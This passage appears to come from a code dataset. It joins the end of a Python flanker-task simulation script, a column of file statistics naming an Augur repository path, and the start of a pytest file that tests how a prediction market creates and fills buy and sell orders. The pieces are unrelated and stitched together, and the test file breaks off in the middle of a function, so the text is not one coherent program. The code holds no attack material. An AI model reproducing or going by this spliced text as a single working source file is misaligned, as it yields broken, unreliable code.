plt.yticks(fontsize=16)
plt.xlim([-0.25,1.25])
plt.ylim([0,800])
plt.xlabel("Previous trial type", fontsize=16)
plt.ylabel("RT", fontsize=16)
plt.savefig("gratton_contextknockout.svg")
plt.show()
def main():
    """Entry point: prepare the data folder and run the flanker analyses.

    Returns
    -------
    tuple
        ``(data, bin_size)`` from the analysis step when an analysis that
        produces them is enabled, otherwise ``(None, None)``.
    """
    folder = "data"
    if not os.path.isdir(folder):
        os.mkdir(folder)

    repetitions = 50

    # runs simulations with varying habitual tendency and reward probability
    # results are stored in data folder
    #run_flanker_simulations(repetitions, folder)
    #run_learningknockout_flanker_simulations(repetitions, folder)
    #run_priorknockout_flanker_simulations(repetitions, folder)
    #run_contextknockout_flanker_simulations(repetitions, folder)
    #data, bin_size = analyze_flanker_simulations(folder)

    # BUG FIX: the original returned `data, bin_size` even though the only
    # line assigning them is commented out above, raising NameError.
    # Default them so the return is always well defined.
    data, bin_size = None, None
    analyze_flanker_knockout(folder)
    return data, bin_size


if __name__ == "__main__":
    data, bin_size = main()
| 44.100082
| 269
| 0.548309
| 6,951
| 53,758
| 4.107323
| 0.0551
| 0.023538
| 0.023538
| 0.031944
| 0.877828
| 0.872504
| 0.863257
| 0.863257
| 0.862137
| 0.857443
| 0
| 0.052404
| 0.294319
| 53,758
| 1,219
| 270
| 44.100082
| 0.700179
| 0.18481
| 0
| 0.821935
| 0
| 0
| 0.083922
| 0.01665
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010323
| false
| 0
| 0.028387
| 0
| 0.042581
| 0.076129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e12f8184b465d91e85c249274350443bba8de7a
| 48,996
|
py
|
Python
|
packages/augur-core/tests/trading/test_trade.py
|
6paklata/augur
|
cb9b0ae8c2be129229e687efdef80aa8d1f5b5d6
|
[
"MIT"
] | null | null | null |
packages/augur-core/tests/trading/test_trade.py
|
6paklata/augur
|
cb9b0ae8c2be129229e687efdef80aa8d1f5b5d6
|
[
"MIT"
] | null | null | null |
packages/augur-core/tests/trading/test_trade.py
|
6paklata/augur
|
cb9b0ae8c2be129229e687efdef80aa8d1f5b5d6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from eth_tester.exceptions import TransactionFailed
from utils import longTo32Bytes, longToHexString, fix, AssertLog, stringToBytes, EtherDelta, PrintGasUsed, BuyWithCash, TokenDelta, nullAddress
from constants import ASK, BID, YES, NO, LONG, SHORT
from pytest import raises, mark
from reporting_utils import proceedToNextRound
from decimal import Decimal
@mark.parametrize('withSelf', [
    True,
    False
])
def test_one_bid_on_books_buy_full_order(withSelf, contractsFixture, cash, market, universe):
    """A single resting bid is completely consumed by an incoming short trade."""
    create_order = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    trade_group = longTo32Bytes(42)
    accounts = contractsFixture.accounts

    # The maker is either the taker itself (self-fill case) or a distinct account.
    maker = accounts[2] if withSelf else accounts[1]

    # Place the resting bid.
    with BuyWithCash(cash, fix('2', '60'), maker, "create order"):
        orderID = create_order.publicCreateOrder(BID, fix(2), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), trade_group, sender=maker)

    # Take the whole order and verify the emitted fill event.
    expected_fill_log = {
        "eventType": 2,
        "addressData": [maker, accounts[2]],
        "uint256Data": [60, 0, YES, 0, 0, 0, fix(2), contractsFixture.contracts['Time'].getTimestamp(), 0, 0],
    }
    with BuyWithCash(cash, fix('2', '40'), accounts[2], "fill order"):
        with AssertLog(contractsFixture, "OrderEvent", expected_fill_log):
            assert trade.publicTrade(SHORT, market.address, YES, fix(2), 60, "0", "0", trade_group, 6, longTo32Bytes(11), sender=accounts[2])

    # The resting order must be fully cleared from the book.
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
@mark.parametrize('afterMkrShutdown', [
    True,
    False
])
def test_one_bid_on_books_buy_partial_order(afterMkrShutdown, contractsFixture, cash, market):
    """Partially fill a resting bid; the remainder must stay on the book.

    Parametrized on whether the MKR system has been shut down first.
    """
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    if afterMkrShutdown:
        contractsFixture.MKRShutdown()

    # create order: maker escrows cash for a 2-share bid at 60
    with BuyWithCash(cash, fix('2', '60'), contractsFixture.accounts[1], "create order"):
        orderID = createOrder.publicCreateOrder(BID, fix(2), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])

    # fill half of the best order and check the emitted OrderEvent
    orderEventLog = {
        "eventType": 2,
        "addressData": [contractsFixture.accounts[1], contractsFixture.accounts[2]],
        "uint256Data": [60, fix(1), YES, 0, 0, 0, fix(1), contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 60)],
    }
    with BuyWithCash(cash, fix('1', '40'), contractsFixture.accounts[2], "trade"):
        with AssertLog(contractsFixture, "OrderEvent", orderEventLog):
            with PrintGasUsed(contractsFixture, "publicTrade", 0):
                # CONSISTENCY FIX: use the SHORT direction constant (as the
                # sibling tests do) instead of the bare literal 1
                fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(1), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # one share remains escrowed on the book at the original price
    assert orders.getAmount(orderID) == fix(1)
    assert orders.getPrice(orderID) == 60
    assert orders.getOrderCreator(orderID) == contractsFixture.accounts[1]
    assert orders.getOrderMoneyEscrowed(orderID) == fix('1', '60')
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    assert fillOrderID == longTo32Bytes(1)
def test_one_bid_on_books_buy_partial_order_fill_loop_limit(contractsFixture, cash, market, universe):
    """Partially fill a resting bid while passing an explicit fill-loop limit."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order
    with BuyWithCash(cash, fix('2', '60'), contractsFixture.accounts[1], "trade 1"):
        orderID = createOrder.publicCreateOrder(BID, fix(2), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])

    # fill best order and check the emitted OrderEvent
    orderEventLog = {
        "eventType": 2,
        "addressData": [contractsFixture.accounts[1], contractsFixture.accounts[2]],
        "uint256Data": [60, fix(1), YES, 0, 0, 0, fix(1), contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 60)],
    }
    with BuyWithCash(cash, fix('1', '40'), contractsFixture.accounts[2], "trade 2"):
        with AssertLog(contractsFixture, "OrderEvent", orderEventLog):
            with PrintGasUsed(contractsFixture, "publicTrade", 0):
                # CONSISTENCY FIX: use the SHORT direction constant (as the
                # sibling tests do) instead of the bare literal 1
                fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(1), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender=contractsFixture.accounts[2])

    # half of the original bid remains on the book
    assert orders.getAmount(orderID) == fix(1)
    assert orders.getPrice(orderID) == 60
    assert orders.getOrderCreator(orderID) == contractsFixture.accounts[1]
    assert orders.getOrderMoneyEscrowed(orderID) == fix('1', '60')
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    assert fillOrderID == longTo32Bytes(1)
def test_one_bid_on_books_buy_excess_order(contractsFixture, cash, market, universe):
    """Consume a resting bid entirely; the excess becomes a new resting order."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order
    with BuyWithCash(cash, fix('4', '60'), contractsFixture.accounts[1], "create order"):
        orderID = createOrder.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])

    # fill best order; expect a fill event plus a create event for the excess
    orderFilledEventLog = {
        "eventType": 2,
        "addressData": [contractsFixture.accounts[1], contractsFixture.accounts[2]],
        "uint256Data": [60, 0, YES, 0, 0, 0, fix(4), contractsFixture.contracts['Time'].getTimestamp(), 0, 0],
    }
    orderCreatedEventLog = {
        "eventType": 0,
        "addressData": [contractsFixture.accounts[2], nullAddress],
        "uint256Data": [60, fix(1), YES, 0, 0, 0, 0, contractsFixture.contracts['Time'].getTimestamp(), 0, fix(1, 40)],
    }
    with AssertLog(contractsFixture, "OrderEvent", orderFilledEventLog):
        with AssertLog(contractsFixture, "OrderEvent", orderCreatedEventLog, skip=1):
            with BuyWithCash(cash, fix('5', '40'), contractsFixture.accounts[2], "trade"):
                fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(5), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender=contractsFixture.accounts[2])

    # the original bid is fully removed from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    # the 1-share excess now rests on the book for the taker
    assert orders.getAmount(fillOrderID) == fix(1)
    assert orders.getPrice(fillOrderID) == 60
    assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
    assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('1', '40')
    assert orders.getOrderSharesEscrowed(fillOrderID) == 0
    assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_two_bids_on_books_buy_both(contractsFixture, cash, market):
    """Two resting bids at the same price are both fully consumed by one trade."""
    create_order = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    trade_group = longTo32Bytes(42)
    accounts = contractsFixture.accounts

    # create order 1
    with BuyWithCash(cash, fix('4', '60'), accounts[1], "create order"):
        orderID1 = create_order.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), trade_group, sender=accounts[1])
    # create order 2
    with BuyWithCash(cash, fix('1', '60'), accounts[3], "create order"):
        orderID2 = create_order.publicCreateOrder(BID, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), trade_group, sender=accounts[3])

    # fill best order
    with PrintGasUsed(contractsFixture, "Fill two", 0):
        with BuyWithCash(cash, fix('5', '40'), accounts[2], "fill best orders"):
            fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(5), 60, "0", "0", trade_group, 6, longTo32Bytes(11), sender=accounts[2])

    # both resting bids are completely cleared from the book
    for resting in (orderID1, orderID2):
        assert orders.getAmount(resting) == 0
        assert orders.getPrice(resting) == 0
        assert orders.getOrderCreator(resting) == longToHexString(0)
        assert orders.getOrderMoneyEscrowed(resting) == 0
        assert orders.getOrderSharesEscrowed(resting) == 0
        assert orders.getBetterOrderId(resting) == longTo32Bytes(0)
        assert orders.getWorseOrderId(resting) == longTo32Bytes(0)
    assert fillOrderID == longTo32Bytes(1)
def test_two_bids_on_books_buy_one_with_limit(contractsFixture, cash, market, universe):
    """With a fill-loop limit of 1 only the first resting bid is consumed."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    with BuyWithCash(cash, fix('4', '60'), contractsFixture.accounts[1], "create order 1"):
        orderID1 = createOrder.publicCreateOrder(BID, fix(4), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    with BuyWithCash(cash, fix('1', '60'), contractsFixture.accounts[3], "create order 2"):
        orderID2 = createOrder.publicCreateOrder(BID, fix(1), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])

    # fill best order, loop limit 1: stops after the first order is filled
    with PrintGasUsed(contractsFixture, "Fill two", 0):
        with BuyWithCash(cash, fix('4', '40'), contractsFixture.accounts[2], "buy complete set"):
            fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(5), 60, "0", "0", tradeGroupID, 1, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # the first bid is fully cleared
    assert orders.getAmount(orderID1) == 0
    assert orders.getPrice(orderID1) == 0
    assert orders.getOrderCreator(orderID1) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID1) == 0
    assert orders.getOrderSharesEscrowed(orderID1) == 0
    assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
    # the second bid is untouched
    assert orders.getAmount(orderID2) == fix(1)
    # We dont create an order since an existing match is on the books
    assert fillOrderID == longTo32Bytes(1)
def test_two_bids_on_books_buy_full_and_partial(contractsFixture, cash, market, universe):
    """One trade fills the first bid fully and the second only partially."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order 1
    with BuyWithCash(cash, fix('12', '60'), contractsFixture.accounts[1], "create order"):
        orderID1 = createOrder.publicCreateOrder(BID, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    # create order 2
    with BuyWithCash(cash, fix('7', '60'), contractsFixture.accounts[3], "create order"):
        orderID2 = createOrder.publicCreateOrder(BID, fix(7), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])

    # fill best order
    with BuyWithCash(cash, fix('15', '40'), contractsFixture.accounts[2], "trade"):
        fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # the first bid (12 shares) is fully consumed
    assert orders.getAmount(orderID1) == 0
    assert orders.getPrice(orderID1) == 0
    assert orders.getOrderCreator(orderID1) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID1) == 0
    assert orders.getOrderSharesEscrowed(orderID1) == 0
    assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
    # the second bid keeps 4 of its 7 shares (15 - 12 = 3 filled)
    assert orders.getAmount(orderID2) == fix(4)
    assert orders.getPrice(orderID2) == 60
    assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
    assert orders.getOrderMoneyEscrowed(orderID2) == fix('4', '60')
    assert orders.getOrderSharesEscrowed(orderID2) == 0
    assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
    assert fillOrderID == longTo32Bytes(1)
def test_two_bids_on_books_buy_one_full_then_create(contractsFixture, cash, market, universe):
    """Fill the better-priced bid fully, skip the worse one, rest the remainder."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order 1 (at 60, matchable)
    with BuyWithCash(cash, fix('12', '60'), contractsFixture.accounts[1], "create order"):
        orderID1 = createOrder.publicCreateOrder(BID, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    # create order 2 (at 50, below the trade price)
    with BuyWithCash(cash, fix('7', '50'), contractsFixture.accounts[3], "create order"):
        orderID2 = createOrder.publicCreateOrder(BID, fix(7), 50, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])

    # fill/create
    with PrintGasUsed(contractsFixture, "buy one and create", 0):
        with BuyWithCash(cash, fix('15', '40'), contractsFixture.accounts[2], "trade"):
            fillOrderID = trade.publicTrade(SHORT, market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # the matchable bid is fully consumed
    assert orders.getAmount(orderID1) == 0
    assert orders.getPrice(orderID1) == 0
    assert orders.getOrderCreator(orderID1) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID1) == 0
    assert orders.getOrderSharesEscrowed(orderID1) == 0
    assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
    # the 50-price bid is untouched
    assert orders.getAmount(orderID2) == fix(7)
    assert orders.getPrice(orderID2) == 50
    assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
    assert orders.getOrderMoneyEscrowed(orderID2) == fix('7', '50')
    assert orders.getOrderSharesEscrowed(orderID2) == 0
    assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
    # the unmatched 3 shares rest on the book for the taker
    assert orders.getAmount(fillOrderID) == fix(3)
    assert orders.getPrice(fillOrderID) == 60
    assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
    assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('3', '40')
    assert orders.getOrderSharesEscrowed(fillOrderID) == 0
    assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_one_ask_on_books_buy_full_order(contractsFixture, cash, market, universe):
    """A single resting ask is completely consumed by an incoming long trade."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order
    with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
        orderID = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])

    # fill best order
    with BuyWithCash(cash, fix('12', '60'), contractsFixture.accounts[2], "buy complete set"):
        fillOrderID = trade.publicTrade(LONG, market.address, YES, fix(12), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # the resting ask is fully cleared from the book
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    assert fillOrderID == longTo32Bytes(1)
def test_one_ask_on_books_buy_partial_order(contractsFixture, cash, market, universe):
    """Partially fill a resting ask; the remainder must stay on the book."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "create order"):
        orderID = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    with BuyWithCash(cash, fix('7', '60'), contractsFixture.accounts[2], "fill best order"):
        fillOrderID = trade.publicTrade(LONG, market.address, YES, fix(7), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # 5 of the 12 shares remain escrowed on the book
    assert orders.getAmount(orderID) == fix(5)
    assert orders.getPrice(orderID) == 60
    assert orders.getOrderCreator(orderID) == contractsFixture.accounts[1]
    assert orders.getOrderMoneyEscrowed(orderID) == fix('5', '40')
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    assert fillOrderID == longTo32Bytes(1)
def test_one_ask_on_books_buy_excess_order(contractsFixture, cash, market, universe):
    """Consume a resting ask entirely; the excess becomes a new resting order."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order
    with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
        orderID = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])

    # fill best order with 3 shares of excess demand
    with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "buy complete set"):
        fillOrderID = trade.publicTrade(LONG, market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # original ask fully removed
    assert orders.getAmount(orderID) == 0
    assert orders.getPrice(orderID) == 0
    assert orders.getOrderCreator(orderID) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID) == 0
    assert orders.getOrderSharesEscrowed(orderID) == 0
    assert orders.getBetterOrderId(orderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID) == longTo32Bytes(0)
    # the 3-share excess rests on the book for the taker
    assert orders.getAmount(fillOrderID) == fix(3)
    assert orders.getPrice(fillOrderID) == 60
    assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
    assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('3', '60')
    assert orders.getOrderSharesEscrowed(fillOrderID) == 0
    assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_two_asks_on_books_buy_both(contractsFixture, cash, market, universe):
    """Two resting asks at the same price are both fully consumed by one trade."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)

    # create order 1
    with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
        orderID1 = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    # create order 2
    with BuyWithCash(cash, fix('3', '40'), contractsFixture.accounts[3], "buy complete set"):
        orderID2 = createOrder.publicCreateOrder(ASK, fix(3), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])

    # fill best order
    with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "buy complete set"):
        fillOrderID = trade.publicTrade(LONG, market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])

    # both resting asks are fully cleared from the book
    assert orders.getAmount(orderID1) == 0
    assert orders.getPrice(orderID1) == 0
    assert orders.getOrderCreator(orderID1) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID1) == 0
    assert orders.getOrderSharesEscrowed(orderID1) == 0
    assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
    assert orders.getAmount(orderID2) == 0
    assert orders.getPrice(orderID2) == 0
    assert orders.getOrderCreator(orderID2) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID2) == 0
    assert orders.getOrderSharesEscrowed(orderID2) == 0
    assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
    assert fillOrderID == longTo32Bytes(1)
def test_two_asks_on_books_buy_full_and_partial(contractsFixture, cash, market):
    """One LONG trade fully fills the first resting ASK and partially fills the second.

    ASKs of 12 and 7 shares @ 60 are resting; taking fix(15) consumes order 1
    entirely plus 3 of order 2's 7 shares, leaving fix(4) on the book.
    """
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)
    # create order 1
    with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "buy complete set"):
        orderID1 = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    # create order
    with BuyWithCash(cash, fix('7', '40'), contractsFixture.accounts[3], "buy complete set"):
        orderID2 = createOrder.publicCreateOrder(ASK, fix(7), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
    # fill best order
    with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "buy complete set"):
        fillOrderID = trade.publicTrade(LONG,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
    # order 1 was fully consumed and removed from the book
    assert orders.getAmount(orderID1) == 0
    assert orders.getPrice(orderID1) == 0
    assert orders.getOrderCreator(orderID1) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID1) == 0
    assert orders.getOrderSharesEscrowed(orderID1) == 0
    assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
    # order 2 was partially filled: fix(4) of the original fix(7) remains escrowed
    assert orders.getAmount(orderID2) == fix(4)
    assert orders.getPrice(orderID2) == 60
    assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
    assert orders.getOrderMoneyEscrowed(orderID2) == fix('4', '40')
    assert orders.getOrderSharesEscrowed(orderID2) == 0
    assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
    # sentinel: the taker's trade was fully satisfied, no remainder order
    assert fillOrderID == longTo32Bytes(1)
def test_two_asks_on_books_buy_one_full_then_create(contractsFixture, cash, market):
    """Taking at 60 fills only the 60-priced ASK; the 70-priced ASK is not
    matched and the taker's remainder becomes a new resting order."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    tradeGroupID = longTo32Bytes(42)
    # create order 1
    with BuyWithCash(cash, fix('12', '40'), contractsFixture.accounts[1], "create order"):
        orderID1 = createOrder.publicCreateOrder(ASK, fix(12), 60, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[1])
    # create order 2
    with BuyWithCash(cash, fix('7', '30'), contractsFixture.accounts[3], "create order"):
        orderID2 = createOrder.publicCreateOrder(ASK, fix(7), 70, market.address, YES, longTo32Bytes(0), longTo32Bytes(0), tradeGroupID, sender = contractsFixture.accounts[3])
    # fill/create
    with BuyWithCash(cash, fix('15', '60'), contractsFixture.accounts[2], "fill and create order"):
        fillOrderID = trade.publicTrade(LONG,market.address, YES, fix(15), 60, "0", "0", tradeGroupID, 6, longTo32Bytes(11), sender = contractsFixture.accounts[2])
    # order 1 (ask @ 60) was fully consumed and removed from the book
    assert orders.getAmount(orderID1) == 0
    assert orders.getPrice(orderID1) == 0
    assert orders.getOrderCreator(orderID1) == longToHexString(0)
    assert orders.getOrderMoneyEscrowed(orderID1) == 0
    assert orders.getOrderSharesEscrowed(orderID1) == 0
    assert orders.getBetterOrderId(orderID1) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID1) == longTo32Bytes(0)
    # order 2 (ask @ 70) is untouched: the taker's limit of 60 does not reach it
    assert orders.getAmount(orderID2) == fix(7)
    assert orders.getPrice(orderID2) == 70
    assert orders.getOrderCreator(orderID2) == contractsFixture.accounts[3]
    assert orders.getOrderMoneyEscrowed(orderID2) == fix('7', '30')
    assert orders.getOrderSharesEscrowed(orderID2) == 0
    assert orders.getBetterOrderId(orderID2) == longTo32Bytes(0)
    assert orders.getWorseOrderId(orderID2) == longTo32Bytes(0)
    # the unfilled fix(3) remainder became a new resting order @ 60 for account 2
    assert orders.getAmount(fillOrderID) == fix(3)
    assert orders.getPrice(fillOrderID) == 60
    assert orders.getOrderCreator(fillOrderID) == contractsFixture.accounts[2]
    assert orders.getOrderMoneyEscrowed(fillOrderID) == fix('3', '60')
    assert orders.getOrderSharesEscrowed(fillOrderID) == 0
    assert orders.getBetterOrderId(fillOrderID) == longTo32Bytes(0)
    assert orders.getWorseOrderId(fillOrderID) == longTo32Bytes(0)
def test_take_best_order(contractsFixture, cash, market):
    """publicFillBestOrder fully consumes a single resting ASK via the on-chain matcher."""
    createOrder = contractsFixture.contracts['CreateOrder']
    trade = contractsFixture.contracts['Trade']
    orders = contractsFixture.contracts['Orders']
    # create order with cash
    with BuyWithCash(cash, fix('1', '40'), contractsFixture.accounts[1], "create order"):
